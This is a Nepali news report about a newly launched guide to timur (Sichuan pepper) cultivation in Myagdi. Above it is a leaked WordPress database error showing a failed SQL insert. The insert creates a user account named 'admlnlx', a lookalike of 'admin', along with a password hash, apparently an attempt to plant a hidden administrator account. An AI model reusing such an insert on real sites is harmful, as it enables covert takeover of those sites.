WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BP2mtnv3RMifQtVpLHi1IatQbp5g6C.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 16:39:27', '', 'admlnlx', 'admlnlx')
बाबियाचौर (म्याग्दी),फागुन ६ –
मसलेदार फल टिम्मुरको खेतीसम्बन्धी सहयोगी पुस्तक प्रकाशन भएको छ ।
जिल्ला वन कार्यालय म्याग्दीका सहायक वन अधिकृत चन्द्रमणि सापकोटाद्वारा लिखित ‘नेपालमा टिम्मुर खेतीका लागि सहयोगी पुस्तिका’ बिहीबार बेनीमा एक कार्यक्रमबीच विमोचन गरियो ।
जडीबुटीसम्बन्धी अध्ययनमा लामो समयदेखि संलग्न रहँदै आउनुभएका उहाँको सो पुस्तक फार्मिङ फर हेल्थले प्रकाशन गरेको हो । पुस्तकमा टिम्मुरको महत्व, उपयोगिता, खेती प्रविधि र बजारीकरणसम्बन्धी अनुसन्धनात्मक लेख समावेश रहेका छन् ।
म्याग्दी उद्योग वाणिज्य सङ्घले आयोजना गरेको विमोचन कार्यक्रममा सांसद एवं पूर्वराज्यमन्त्री नरदेवी पुनले यो पुस्तक टिम्मुर खेती गर्ने कृषकका लागि सहयोगी र उपयोगी हुने बताउनुभयो ।
मुखमा राख्दा रमरम गर्ने स्वाद हुने टिमुर अचार, दाल र चटनीमा मसलाका साथै शरीरलाई न्यानो बनाउन, हाडजोर्नी, पेट दुख्दा र लेक लाग्दा आयुर्वेदिक औषधिका रुपमा प्रयोग गरिन्छ । सहरी क्षेत्रका होटलमा अचार र दालमा मसलाका रुपमा टिम्मुर खपत हुने गर्छ । – रासस